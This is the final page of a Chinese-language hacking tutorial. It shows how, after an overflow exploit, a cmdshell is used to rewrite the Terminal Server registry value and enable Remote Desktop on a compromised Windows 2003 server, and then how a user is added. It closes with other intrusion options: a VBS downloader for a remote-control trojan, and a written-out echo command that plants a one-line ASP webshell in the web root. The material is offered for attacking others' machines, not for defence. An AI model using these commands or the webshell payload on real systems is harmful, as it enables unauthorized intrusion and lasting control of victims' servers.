我们要做的就是把"0x1"改成"0x0"！直接用"reg add"是不行的，必须把原来键值删掉再添加！在cmdshell下执行：

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

会询问是否"要删除注册表值 fDenyTSConnections 吗"，当然Yes了，如图8。

再执行：

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0

提示操作成功完成，如图9。

这样就把"fDenyTSConnections"的值改为"0x0"了，我们可以执行：

reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"

我们可以查看一下，看看是不是真的改掉了，发现已经成功更改了数据，如图10。

现在再来连接服务器的3389看看，发现已经可以成功连接上了，加个用户进去参观咯，如图11。

至此2003下cmdshell开启远程桌面服务的方法也介绍完了。

四、其他

       当然了，溢出后也不一定要非要在cmdshell下开启远程桌面服务。可以echo个vbs文件，下载远程控制木马，然后在cmdshell里运行一下木马，上线就OK了。还有就是可以查询一下目标IP是否绑定有网站，然后找到网站目录，再用echo个一句话木马进去（命令是：echo "<%execute request("cmd")%>" >WEB路径\test.asp），然后提交大马呀，上传开3389的工具再开启也行！总之方法不只一个，能达到目的就是好方法。

上一页  [1] [2] [3]